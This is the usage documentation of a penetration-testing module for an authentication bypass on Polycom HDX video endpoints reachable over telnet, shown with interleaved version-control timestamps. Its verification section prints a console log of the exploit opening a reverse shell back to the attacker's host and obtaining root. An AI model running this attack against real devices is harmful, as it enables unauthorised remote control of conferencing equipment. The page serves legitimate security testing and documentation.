2016-07-29 22:02:11 -04:00
|
|
|
## Vulnerable Application
|
|
|
|
|
|
2016-08-01 14:02:17 -05:00
|
|
|
This module exploits the Polycom HDX video endpoints with software <= 3.0.5.
|
2016-08-01 13:56:39 -05:00
|
|
|
It was tested on a Polycom HDX 7000 running software version 3.0.3. Telnet port
|
|
|
|
|
23 should be accessible, as it is with the factory default configuration.
|
|
|
|
|
|
|
|
|
|
## Verification Steps
|
|
|
|
|
|
|
|
|
|
A successful check of the exploit will look like this:
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
msf exploit(psh_auth_bypass) > use exploit/unix/misc/psh_auth_bypass
|
|
|
|
|
msf exploit(psh_auth_bypass) > run
|
|
|
|
|
|
|
|
|
|
[*] Started reverse double SSL handler on 192.168.1.120:4444
|
|
|
|
|
[*] 192.168.1.155:23 - Starting Authentication bypass with 6 threads with 100 max connections
|
|
|
|
|
[+] 192.168.1.155:23 - 192.168.1.155:23 Successfully exploited the authentication bypass flaw
|
|
|
|
|
[+] 192.168.1.155:23 - Sending payload of 178 bytes to 192.168.1.155:40186...
|
|
|
|
|
[*] Accepted the first client connection...
|
|
|
|
|
[*] Accepted the second client connection...
|
|
|
|
|
[*] Command: echo xInxktvgUmm7hPyh;
|
|
|
|
|
[*] Writing to socket A
|
|
|
|
|
[*] Writing to socket B
|
|
|
|
|
[*] Reading from sockets...
|
|
|
|
|
[*] Reading from socket B
|
|
|
|
|
[*] B: "xInxktvgUmm7hPyh\n"
|
|
|
|
|
[*] Matching...
|
|
|
|
|
[*] A is input...
|
|
|
|
|
[*] Command shell session 1 opened (192.168.1.120:4444 -> 192.168.1.155:37728) at 2016-08-01 13:49:06 -0500
|
|
|
|
|
[*] 192.168.1.155:23 - Shutting down payload stager listener...
|
|
|
|
|
|
|
|
|
|
whoami
|
|
|
|
|
root
|
|
|
|
|
uname -a
|
|
|
|
|
Linux polycom.lan 2.6.33.3-rt17.p2.25 #1 PREEMPT RT Wed Aug 3 14:08:40 CDT 2011 ppc unknown
|
|
|
|
|
```
|
